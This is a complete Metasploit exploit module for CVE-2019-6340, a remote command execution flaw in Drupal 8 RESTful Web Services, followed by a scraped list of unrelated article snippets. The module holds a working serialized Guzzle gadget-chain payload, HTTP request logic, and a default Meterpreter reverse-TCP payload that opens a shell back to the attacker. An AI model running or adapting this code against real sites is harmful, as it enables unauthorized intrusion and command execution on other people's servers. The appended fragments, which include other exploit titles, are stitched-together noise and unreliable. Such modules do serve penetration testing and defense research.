##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Remote

  # NOTE: All (four) Web Services modules need to be enabled

  Rank = NormalRanking

  include Msf::Exploit::Remote::HTTP::Drupal

  def initialize(info = {})

    super(update_info(info,

      'Name'               => 'Drupal RESTful Web Services unserialize() RCE',

      'Description'        => %q{

        This module exploits a PHP unserialize() vulnerability in Drupal RESTful

        Web Services by sending a crafted request to the /node REST endpoint.

        As per SA-CORE-2019-003, the initial remediation was to disable POST,

        PATCH, and PUT, but Ambionics discovered that GET was also vulnerable

        (albeit cached). Cached nodes can be exploited only once.

        Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of

        this alternate vector.

        Drupal < 8.5.11 and < 8.6.10 are vulnerable.

      },

      'Author'             => [

        'Jasper Mattsson', # Discovery

        'Charles Fol',     # PoC

        'Rotem Reiss',     # Module

        'wvu'              # Module

      ],

      'References'         => [

        ['CVE', '2019-6340'],

        ['URL', 'https://www.drupal.org/sa-core-2019-003'],

        ['URL', 'https://www.drupal.org/psa-2019-02-22'],

        ['URL', 'https://www.ambionics.io/blog/drupal8-rce'],

        ['URL', 'https://github.com/ambionics/phpggc'],

        ['URL', 'https://twitter.com/jcran/status/1099206271901798400']

      ],

      'DisclosureDate'     => '2019-02-20',

      'License'            => MSF_LICENSE,

      'Platform'           => ['php', 'unix'],

      'Arch'               => [ARCH_PHP, ARCH_CMD],

      'Privileged'         => false,

      'Targets'            => [

        ['PHP In-Memory',

          'Platform'       => 'php',

          'Arch'           => ARCH_PHP,

          'Type'           => :php_memory,

          'Payload'        => {'BadChars' => "'"},

          'DefaultOptions' => {

            'PAYLOAD'      => 'php/meterpreter/reverse_tcp'

          }

        ],

        ['Unix In-Memory',

          'Platform'       => 'unix',

          'Arch'           => ARCH_CMD,

          'Type'           => :unix_memory,

          'DefaultOptions' => {

            'PAYLOAD'      => 'cmd/unix/generic',

            'CMD'          => 'id'

          }

        ]

      ],

      'DefaultTarget'      => 0,

      'Notes'              => {

        'Stability'        => [CRASH_SAFE],

        'SideEffects'      => [IOC_IN_LOGS],

        'Reliablity'       => [UNRELIABLE_SESSION], # When using the GET method

        'AKA'              => ['SA-CORE-2019-003']

      }

    ))

    register_options([

      OptEnum.new('METHOD', [true, 'HTTP method to use', 'POST',

                            ['GET', 'POST', 'PATCH', 'PUT']]),

      OptInt.new('NODE',    [false, 'Node ID to target with GET method', 1])

    ])

    register_advanced_options([

      OptBool.new('ForceExploit', [false, 'Override check result', false])

    ])

  end

  def check

    checkcode = CheckCode::Unknown

    version = drupal_version

    unless version

      vprint_error('Could not determine Drupal version')

      return checkcode

    end

    if version.to_s !~ /^8\b/

      vprint_error("Drupal #{version} is not supported")

      return CheckCode::Safe

    end

    vprint_status("Drupal #{version} targeted at #{full_uri}")

    checkcode = CheckCode::Detected

    changelog = drupal_changelog(version)

    unless changelog

      vprint_error('Could not determine Drupal patch level')

      return checkcode

    end

    case drupal_patch(changelog, 'SA-CORE-2019-003')

    when nil

      vprint_warning('CHANGELOG.txt no longer contains patch level')

    when true

      vprint_warning('Drupal appears patched in CHANGELOG.txt')

      checkcode = CheckCode::Safe

    when false

      vprint_good('Drupal appears unpatched in CHANGELOG.txt')

      checkcode = CheckCode::Appears

    end

    # Any further with GET and we risk caching the targeted node

    return checkcode if meth == 'GET'

    # NOTE: Exploiting the vuln will move us from "Safe" to Vulnerable

    token = Rex::Text.rand_text_alphanumeric(8..42)

    res   = execute_command("echo #{token}")

    return checkcode unless res

    if res.body.include?(token)

      vprint_good('Drupal is vulnerable to code execution')

      checkcode = CheckCode::Vulnerable

    end

    checkcode

  end

  def exploit

    if [CheckCode::Safe, CheckCode::Unknown].include?(check)

      if datastore['ForceExploit']

        print_warning('ForceExploit set! Exploiting anyway!')

      else

        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')

      end

    end

    if datastore['PAYLOAD'] == 'cmd/unix/generic'

      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')

      # XXX: Naughty datastore modification

      datastore['DUMP_OUTPUT'] = true

    end

    case target['Type']

    when :php_memory

      # XXX: This will spawn a *very* obvious process

      execute_command("php -r '#{payload.encoded}'")

    when :unix_memory

      execute_command(payload.encoded)

    end

  end

  def execute_command(cmd, opts = {})

    vprint_status("Executing with system(): #{cmd}")

    # https://en.wikipedia.org/wiki/Hypertext_Application_Language

    hal_json = JSON.pretty_generate(

      'link'      => [

        'value'   => 'link',

        'options' => phpggc_payload(cmd)

      ],

      '_links'    => {

        'type'    => {

          'href'  => vhost_uri

        }

      }

    )

    print_status("Sending #{meth} to #{node_uri} with link #{vhost_uri}")

    res = send_request_cgi({

      'method'   => meth,

      'uri'      => node_uri,

      'ctype'    => 'application/hal+json',

      'vars_get' => {'_format' => 'hal_json'},

      'data'     => hal_json

    }, 3.5)

    return unless res

    case res.code

    # 401 isn't actually a failure when using the POST method

    when 200, 401

      print_line(res.body) if datastore['DUMP_OUTPUT']

      if meth == 'GET'

        print_warning('If you did not get code execution, try a new node ID')

      end

    when 404

      print_error("#{node_uri} not found")

    when 405

      print_error("#{meth} method not allowed")

    when 422

      print_error('VHOST may need to be set')

    when 406

      print_error('Web Services may not be enabled')

    else

      print_error("Unexpected reply: #{res.inspect}")

    end

    res

  end

  # phpggc Guzzle/RCE1 system id

  def phpggc_payload(cmd)

    (

      # http://www.phpinternalsbook.com/classes_objects/serialization.html

      <<~EOF

        O:24:"GuzzleHttp\\Psr7\\FnStream":2:{

          s:33:"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{

            s:5:"close";a:2:{

              i:0;O:23:"GuzzleHttp\\HandlerStack":3:{

                s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";

                  s:cmd_len:"cmd";

                s:30:"\u0000GuzzleHttp\\HandlerStack\u0000stack";

                  a:1:{i:0;a:1:{i:0;s:6:"system";}}

                s:31:"\u0000GuzzleHttp\\HandlerStack\u0000cached";

                  b:0;

              }

              i:1;s:7:"resolve";

            }

          }

          s:9:"_fn_close";a:2:{

            i:0;r:4;

            i:1;s:7:"resolve";

          }

        }

      EOF

    ).gsub(/\s+/, '').gsub('cmd_len', cmd.length.to_s).gsub('cmd', cmd)

  end

  def meth

    datastore['METHOD'] || 'POST'

  end

  def node

    datastore['NODE'] || 1

  end

  def node_uri

    if meth == 'GET'

      normalize_uri(target_uri.path, '/node', node)

    else

      normalize_uri(target_uri.path, '/node')

    end

  end

  def vhost_uri

    full_uri(

      normalize_uri(target_uri.path, '/rest/type/shortcut/default'),

      vhost_uri: true

    )

  end

end

[EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. WebStorm 11、PhpStorm 10免费激活(不需要注册码)

    之前分享的WebStorm9.WebStrom10.PhpStorm9注册码生成网站已经被站长关了,比较遗憾!http://my.oschina.net/ximidao/blog/486353 现在官 ...

  4. 下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y),y++);

    下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y) ...

  5. ssh The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established

    The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established. ECDSA key fingerprint is SH ...

  6. jenkins git can't work ERROR: Timeout after 10 minutes ERROR: Error fetching remote repo 'origin'

    Started by user Allen Running as Allen Building remotely on MISTestSrv2 (MIS) in workspace C:\jenkin ...

  7. 10 Future Web Trends 十大未来互联网趋势

    转载自:http://blog.sina.com.cn/s/blog_4be577310100ajpb.html 我们很满意自己进入的当前网络纪元,通常被称为Web 2.0.这个阶段互联网的特征包括搜 ...

  8. CXF(2.7.10) - RESTful Services, JSON Support

    在 CXF(2.7.10) - RESTful Services 介绍了 REST 风格的 WebService 服务,数据传输是基于 XML 格式的.如果要基于 JSON 格式传输数据,仅需要将注解 ...

  9. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

随机推荐

  1. flash/flex builder在IE中stage.stageWidth始终为0的解决办法

    这应该是IE的bug,解决办法: 原作者:菩提树下的杨过出处:http://yjmyzz.cnblogs.com stage.align=StageAlign.TOP_LEFT; stage.scal ...

  2. JS实现数组去重方法总结(三种常用方法)

    方法一: 双层循环,外层循环元素,内层循环时比较值 如果有相同的值则跳过,不相同则push进数组 Array.prototype.distinct = function(){ var arr = th ...

  3. HDU6030 Happy Necklace(递推+矩阵快速幂)

    传送门:点我 Little Q wants to buy a necklace for his girlfriend. Necklaces are single strings composed of ...

  4. SpringBoot集成Jasypt安全框架,配置文件内容加密

    我们在SpringBoot项目中的yml或者properties配置文件中都是明文的,相对而言安全性就低了很多.都知道配置文件中的都是一些数据库连接用户名密码啊.一些第三方密钥等信息.所以我们谨慎点, ...

  5. dpkg: error: dpkg status database is locked by another process

    First run: lsof /var/lib/dpkg/lock Then make sure that process isn't running: ps cax | grep PID If i ...

  6. Spring 系列目录

    Spring(https://spring.io/) 系列目录 第一篇:Spring 系列 第一章 Spring Core (1) Convert 1.1.1 Spring ConversionSer ...

  7. service 设计问题

    今天写了一段让自己尴尬的代码,就是在一个方法中调用了两个 service 方法,而我为每个service 都定义了 事物回滚. 然后郁闷了,我执行请求调用该方法, 发现第二个service方法执行失败 ...

  8. Chapter3_操作符_别名机制

    Java中的别名机制实际体现的是对于“=”这一类赋值操作符的使用规则和内涵.“=”的实际内涵是指将右边的变量的值(对于基本数据类型而言)或者某一个对象的引用(对于某个具体对象而言)复制到左边的变量名所 ...

  9. Linux学习---条件预处理的应用

    预处理的使用: ⑴包含头文件 #include ⑵宏定义 #define    替换,不进行语法检查 ①常量宏定义:#define 宏名 (宏体) (加括号为防止不进行语法检查而出现的错误) eg:# ...

  10. java生成pdf文件 --- Table

    Java利用itext实现导出PDF文件 所需要的jar包:com.lowagie.text_2.1.7.v201004222200.jar jar包下载地址:http://cn.jarfire.or ...